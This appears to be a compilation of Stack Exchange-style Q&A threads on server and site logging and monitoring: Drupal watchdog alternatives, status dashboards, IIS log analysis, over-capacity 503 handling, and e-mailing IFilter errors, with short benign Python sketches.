Securing Drupal: Alternative to Watchdog? - security

Hi, I'm going through and securing a Drupal 7 site I run, using the Security Review module. One of the recommendations is not to use watchdog to log events to the screen, i.e. the database, I guess. If I turn that off, is there another secure way to send logs to my workstation so that I can monitor traffic to the site, i.e. what people view, broken links, and the like?
I'm on a shared host, not a dedicated host. I searched for some different ways to do this, but I really don't know where to start. Should I download a module to do this? Or does Drupal report all this information to the server logs? Sorry if I'm not formatting this question correctly, but I'm not too clear on how to do this.

Are you sure the recommendation is about Drupal's watchdog, and not about displaying error messages on the pages? These are two different things.
That said, in Drupal the watchdog is only an API for logging system messages. Where the messages go, and how they are actually stored, is a pluggable system. By default, Drupal uses a module called "Database logging" (dblog) to log messages to the database. A syslog module is also provided, but it's not really an option if you are on shared hosting. A quick search reveals modules to send messages to Logentries, Logstash (and Loggly), Slack, LogIO, email, etc.
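The pluggable backend idea is the same pattern as handlers in Python's standard logging module, so here is the concept sketched in Python rather than Drupal's PHP: one logging call fans out to whichever backends are attached. The handler choices and names are purely illustrative, not Drupal APIs.

```python
import logging

# One "watchdog"-style logger; backends are swappable handlers.
watchdog = logging.getLogger("watchdog")
watchdog.setLevel(logging.INFO)

# Backend 1: write to a local file (stand-in for database logging / dblog).
file_handler = logging.FileHandler("site.log")
file_handler.setFormatter(
    logging.Formatter("%(asctime)s %(levelname)s %(message)s")
)
watchdog.addHandler(file_handler)

# Backend 2 could be a remote collector (stand-in for syslog/Loggly):
# logging.handlers.SysLogHandler or HTTPHandler could be attached here
# without changing any of the call sites below.

watchdog.info("page not found: /old-link")
```

The point is that code calling `watchdog.info(...)` never changes when you swap where the messages end up, which is exactly why disabling dblog doesn't have to mean losing your logs.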

If you have a gigantic site with millions of hits a day then, yeah, don't use watchdog.
But if it's just a small site, just use watchdog to log your events. And seeing that it's on a shared host, it's not a high-profile site. Using watchdog is fine.

Related

How to design a web application to monitor server status in the browser

I just want to try creating a web application to monitor server status, and I need some design guidelines.
Should I use a scripting language like Python or Ruby to get the stats? Is polling the only way to do it? If so, how frequently should we poll?
If you don't care about data retention, writing a simple web app in ruby or python that polls from the browser would probably be fine. You could alternately use websockets and push data from a CLI-based monitoring agent of some sort that ran in the background on your server.
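As a rough sketch of that stdlib-only polling approach, here is a minimal Python status endpoint a browser could poll with `setInterval`. The metric names, port, and endpoint are assumptions, and `os.getloadavg` is Unix-only.

```python
import json
import os
import shutil
from http.server import BaseHTTPRequestHandler, HTTPServer

def collect_stats():
    """Gather a few cheap host metrics (load average is Unix-only)."""
    total, used, free = shutil.disk_usage("/")
    return {
        "load_avg_1m": os.getloadavg()[0],
        "disk_free_bytes": free,
        "disk_used_pct": round(used / total * 100, 1),
    }

class StatsHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # The browser polls this endpoint, e.g. every 5-10 seconds.
        body = json.dumps(collect_stats()).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.end_headers()
        self.wfile.write(body)

# To run: HTTPServer(("", 8080), StatsHandler).serve_forever()
```

Anything fancier (history, graphs, alerting) is where the retention problem starts and the dedicated tools below earn their keep.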
If you don't care about data fidelity, then you might be able to use something simple like pingdom.
If you do care about data retention and you need lots of custom monitoring, then it's a much harder problem. There are a number of open source projects and paid applications that will solve this problem in various ways. As mentioned in the comment on your post, ganglia could work. You might also look into nagios or munin. If you need app level stats, you could check out statsd/graphite or influxdb/grafana.
If you want server monitoring but don't want to manage additional infrastructure, there are a lot of solutions in the paid space including librato, newrelic, and instrumental.
Note: I am an owner of Instrumental, so I'm biased toward that, but I think your question needs more details to narrow down any recommendations on infrastructure monitoring.

What are the tools to parse/analyze IIS logs - ideally free/open source?

Note: there are a few similar questions already asked here, but they are from 2009. Maybe something has changed since then.
I'm responsible for a bunch of websites hosted on different servers. I don't do any log analysis right now, but I would like to change this. First question: what is the best tool to spot ISSUES with a website based on IIS logs (i.e. 404s, 500s, long page processing times, etc.), ideally with grouping/sorting options? I don't want to spend a lot of time on this; I just want to periodically check that all is well with the website.
Second question (and I know I'm most likely asking for too much): is there any way to expose the processed logs to the web? So I can review the things mentioned above without RDPing into the server.
Ideally I'm looking for a free/open-source solution, but I'm ready to pay for good software as well (just not a lot of $$).
Thank you.
You can take a look at our log monitoring solution EventSentry, which can monitor text-based logs like IIS logs. We have standard templates set up for IIS, and we can consolidate the logs in a database with web access, so that you can review the logs without using RDP.
It's a pretty flexible solution that lets you pick the fields you are interested in and ignore the ones you are not - and thus save space in your database.
You can also set up real-time alerts, so that you get an email when a critical error, like a 500, is encountered in a log file.
http://www.eventsentry.com/features/log-file-monitoring
Finally, you can also plug in command-line tools which can verify that a given web page is accessible, or alert you when it changes: http://www.eventsentry.com/features/application-monitoring.
I'm biased of course, but I would say that our solution is pretty affordable. Since it offers additional functionality as well, such as service monitoring (to monitor your IIS services) and event log monitoring (IIS does log critical messages to the event log), you can set up comprehensive monitoring with a single product.
I'd look into #LuckyLuke's solution (or similar) - the classic "build vs. buy" decision. Based on your post, this isn't going to be your full-time job, so IMHO it's best to leave it to those who do this for a living...
I don't know what "legacy" answers you are referring to, but if you want to tinker you can use Microsoft's own Log Parser, and depending on how far you want to go with it, you can use it (a COM DLL) to write your own "admin web pages" in .NET/ASP.NET and host them on each of your servers...
If you're only interested in very specific errors, another "hacky" way would be to provide your own custom error pages (either replacing the default IIS error pages, or configuring your ASP.NET apps to use specific error pages).
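If you do go the tinkering route, a short script already answers the "is everything OK?" question. Here is a hedged sketch in Python that reads a W3C extended format IIS log (the field names come from the `#Fields:` directive in the log itself) and summarizes 4xx/5xx responses and slow requests; the slow-request threshold and the exact fields present are assumptions based on a typical IIS logging configuration.

```python
from collections import Counter

def parse_iis_log(path):
    """Yield one dict per request from a W3C extended format IIS log.
    The log is space-delimited, with field names declared in '#Fields:'."""
    fields = []
    with open(path) as f:
        for line in f:
            line = line.strip()
            if line.startswith("#Fields:"):
                fields = line.split()[1:]
            elif line and not line.startswith("#"):
                yield dict(zip(fields, line.split()))

def error_summary(path, slow_ms=5000):
    """Count 4xx/5xx responses per URL and collect slow requests."""
    errors = Counter()
    slow = []
    for row in parse_iis_log(path):
        status = row.get("sc-status", "")
        if status.startswith(("4", "5")):
            errors[(status, row.get("cs-uri-stem", "?"))] += 1
        if int(row.get("time-taken", 0)) > slow_ms:
            slow.append(row.get("cs-uri-stem", "?"))
    return errors, slow
```

Run nightly against the previous day's log and you get exactly the periodic "grouping/sorting" check the question asks for, with no extra infrastructure.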

How do I show a warning when the server is over capacity, to keep the server from going down?

Twitter sometimes shows the message: "Twitter is over capacity."
This prevents too much pressure on the servers, which keeps them from going down.
How do I implement this in my application?
Edit: I am NOT looking for a PHP specific solution.
I think this can easily be achieved by using separate software to watch the server status and, under too much pressure, show the specified message. This is very important in a cloud architecture, so you can easily launch new instances. I think Amazon uses CloudWatch for this. You could also watch the server with Apache's mod_status, again from a separate piece of software.
Hope this helps, Gabriel
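A minimal, language-agnostic sketch of the application-side check, written here in Python: before doing real work, consult a cheap health signal and shed load with a 503 if it's too high. The load-average heuristic, thresholds, and function names are illustrative assumptions, not from any particular framework, and `os.getloadavg` is Unix-only.

```python
import os

# Illustrative threshold; tune for your hardware and workload.
MAX_LOAD_PER_CPU = 2.0

def over_capacity():
    """Cheap health check: 1-minute load average vs. CPU count."""
    load_1m = os.getloadavg()[0]
    return load_1m > MAX_LOAD_PER_CPU * os.cpu_count()

def handle_request(render_page):
    """Front-controller style guard: shed load before doing real work."""
    if over_capacity():
        # 503 Service Unavailable tells clients and load balancers
        # to back off and retry later, instead of piling on.
        return 503, "We're over capacity. Please try again in a moment."
    return 200, render_page()
```

Returning 503 (rather than a 200 with an error message, as some sites do) is the design choice that lets upstream proxies and monitoring react correctly.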

How to write my own Server Logging script?

I need to log the hits on a sub-domain in Windows IIS 6.0 without designating it as a separate website in IIS Manager. I have been told this is not possible. How can I write my own script to do this?
I'm afraid Google Analytics is not an option due to the setup; I just need access (I'm guessing) to the file request event and its properties.
Wyatt Barnette - I've thought of this! But how do I set those properties so it collects them all? I'm writing my own log-parsing software, since I need specific things; I just need the server to generate the logs for me to parse!
Have you considered using Google Analytics across all your sites? I know that this is not true logging...but sometimes addressing simple problems with simple solutions is easier! Log parsing seems to be slowly fading away...
What you should be able to do is have your stats tracking package look at multiple IIS websites as a single site.
If your logging package can't handle this, check out the IIS log parsing tool. That should at least take care of the more onerous part of the task (actually making sense of the logfiles). From there it is a pretty straightforward reporting operation.
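One concrete way to treat multiple hosts in a single IIS site's log: if the `cs-host` field is enabled in the site's logging properties, every request records the Host header, so a small parser can split hits per sub-domain without separate IIS sites. A hedged Python sketch, assuming the standard W3C extended log format:

```python
from collections import Counter

def hits_by_host(path):
    """Count hits per Host header (cs-host) from a W3C format IIS log.
    Assumes cs-host is enabled in the site's logging properties."""
    fields = []
    counts = Counter()
    with open(path) as f:
        for line in f:
            line = line.strip()
            if line.startswith("#Fields:"):
                fields = line.split()[1:]
            elif line and not line.startswith("#"):
                row = dict(zip(fields, line.split()))
                counts[row.get("cs-host", "-")] += 1
    return counts
```

Filtering the same rows on `cs-host == "sub.example.com"` before feeding them to any reporting step gives you the "sub-domain as its own log" view the question asks for.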

What's a good strategy for exposing fatal IFilter problems to the user?

How do I expose errors that occur inside an IFilter to the user?
The IFilter can be loaded by a variety of Microsoft products, including server products like SharePoint. It will be separated into modules, one of which is an NT service handling the indexing of huge files; the connection will be performed via RPC. So just about anything can go wrong - permissions can be insufficient and the RPC call will fail, or whatever else. Until the problem is fixed, the IFilter will simply not work from the consumer application's point of view.
How do I at least log the error messages in some convenient way? Should I just write a log file into Windows\System32 or is there some better way?
Where there is no way to communicate problems like this to the user, I've used (and often seen used) e-mail. There is great support for it in the .NET Framework and it works well.
The main thing to be careful of is to add protections to ensure users aren't spammed and mail servers don't get overloaded! In this situation or if mailing fails altogether, it's important to fall back to logging somewhere.
Also make sure to consider the audience and if it is appropriate to e-mail end users or an administrator for this particular type of message. Presumably an admin would be able to do something about it whereas a user would be confused.
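A minimal sketch of the e-mail path with the spam protection mentioned above: a time-based throttle plus a logging fallback so nothing is lost when mail fails. The SMTP host, addresses, and interval are placeholders, and Python stands in here for whatever language the IFilter host actually uses.

```python
import logging
import smtplib
import time
from email.message import EmailMessage

ALERT_INTERVAL = 3600  # send at most one alert e-mail per hour
_last_sent = 0.0

def send_alert(subject, body, smtp_host="localhost",
               to_addr="admin@example.com"):
    """Send a throttled alert e-mail; fall back to logging on failure.
    Host and addresses are illustrative placeholders."""
    global _last_sent
    now = time.time()
    if now - _last_sent < ALERT_INTERVAL:
        # Throttled: record it locally instead of spamming the admin.
        logging.getLogger("alerts").warning("throttled: %s", subject)
        return False
    msg = EmailMessage()
    msg["Subject"] = subject
    msg["From"] = "ifilter@example.com"
    msg["To"] = to_addr
    msg.set_content(body)
    try:
        with smtplib.SMTP(smtp_host) as smtp:
            smtp.send_message(msg)
        _last_sent = now
        return True
    except OSError:
        # Mail failed entirely: fall back to a local log so the
        # original error isn't silently dropped.
        logging.getLogger("alerts").error("mail failed: %s: %s",
                                          subject, body)
        return False
```

Sending to an administrator address (not end users) matches the point above: the admin can actually act on an RPC or permissions failure.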
